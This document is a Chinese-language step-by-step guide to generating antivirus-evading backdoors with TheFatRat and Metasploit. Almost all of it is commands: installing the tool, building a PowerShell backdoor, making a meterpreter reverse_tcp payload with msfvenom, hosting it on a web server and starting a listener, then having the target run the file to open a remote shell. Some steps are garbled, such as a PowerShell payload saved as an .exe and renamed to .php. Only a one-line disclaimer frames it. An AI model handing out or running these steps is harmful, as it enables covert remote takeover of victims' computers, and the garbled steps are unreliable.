TheFatRat是一款后门生成工具,可以配合Metasploit框架使用,以绕过杀毒软件的检测。以下是使用TheFatRat的基本步骤:
安装TheFatRat
克隆TheFatRat的GitHub仓库到本地:
```
git clone https://github.com/Screetsec/TheFatRat.git
```
进入TheFatRat目录并赋予执行权限:
```
cd TheFatRat
chmod +x setup.sh
chmod +x fatrat
```
运行安装脚本:
```
./setup.sh
```
启动TheFatRat
安装完成后,直接在终端输入`fatrat`启动:
```
fatrat
```
使用TheFatRat生成后门
在主菜单选择生成后门的选项,例如选择生成PowerShell后门:
```
选择1
```
输入侦听端信息和后门名称,然后选择生成后门的类型和保存位置:
```
输入侦听端信息
输入后门名称
选择生成后门的类型
```
生成的后门文件将存放在`output`目录下。
配合Metasploit使用
使用`msfvenom`生成meterpreter reverse_tcp payload:
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -f psh-cmd
```
将生成的payload保存为文件,例如`sch01ar.php`,并将其放置在Web服务器的根目录下:
```
mv /path/to/payload.exe /var/www/html/sch01ar.php
```
启动Web服务器(如Apache)并配置Metasploit监听器:
```
service apache2 start
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
```
执行后门
将生成的后门文件(如`sch01ar.php`)放置在目标系统上,并通过浏览器访问该文件,即可建立与Metasploit的连接。
请注意,使用TheFatRat和Metasploit进行后门生成和执行是非法的,仅适用于合法的安全测试和漏洞评估。请确保在获得明确授权的情况下进行操作。